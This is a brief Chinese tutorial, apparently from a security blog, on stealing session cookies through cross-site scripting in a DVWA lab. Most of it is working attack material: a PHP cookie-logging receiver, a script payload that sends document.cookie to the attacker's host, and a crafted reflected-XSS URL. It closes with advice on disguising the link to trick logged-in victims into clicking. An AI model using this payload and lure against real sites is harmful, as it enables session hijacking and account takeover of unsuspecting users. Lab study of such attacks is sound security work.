在网上找到很多关于利用XSS漏洞获取对方cookie的文章,总结归纳并咨询了研发人员,编制了一个简单的cookie接收脚本,简单有效,测试通过。
(1)环境搭建
kali linux:192.168.80.136
目标win7: 192.168.80.130
Metasploitable:192.168.80.129
cookie接收脚本get.php(脚本在/var/www/html文件夹下,html文件夹权限777):
<?php $ck =$_GET['cookie']; error_log("$ck\n",3,"cookie.txt"); ?>
(2)XSS漏洞利用
目标登录metasploitable的DVWA,点击存在XSS漏洞的页面,输入如下代码后提交:<script>newImage().src="http://192.168.80.136/get.php?cookie="+document.cookie;</script>
(3)查看cookie
切换到kali,直接查看cookie.txt内容,可以看到获得的cookie。
(4)进一步利用
目标提交后可以在地址栏看到如下URL:
http://192.168.80.129/dvwa/vulnerabilities/xss_r/?name=%3Cscript%3Enew+Image%28%29.src%3D%22http%3A%2F%2F192.168.80.136%2Fget.php%3Fcookie%3D%22%2Bdocument.cookie%3B%3C%2Fscript%3E#
可以将以上URL伪装成其他形式(如图片),诱使目标点击,在目标已登录的情况下,可以达到同样获取cookie的效果。
来源:freebuf.com 2019-09-08 23:14:20 by: Rname红名
请登录后发表评论
注册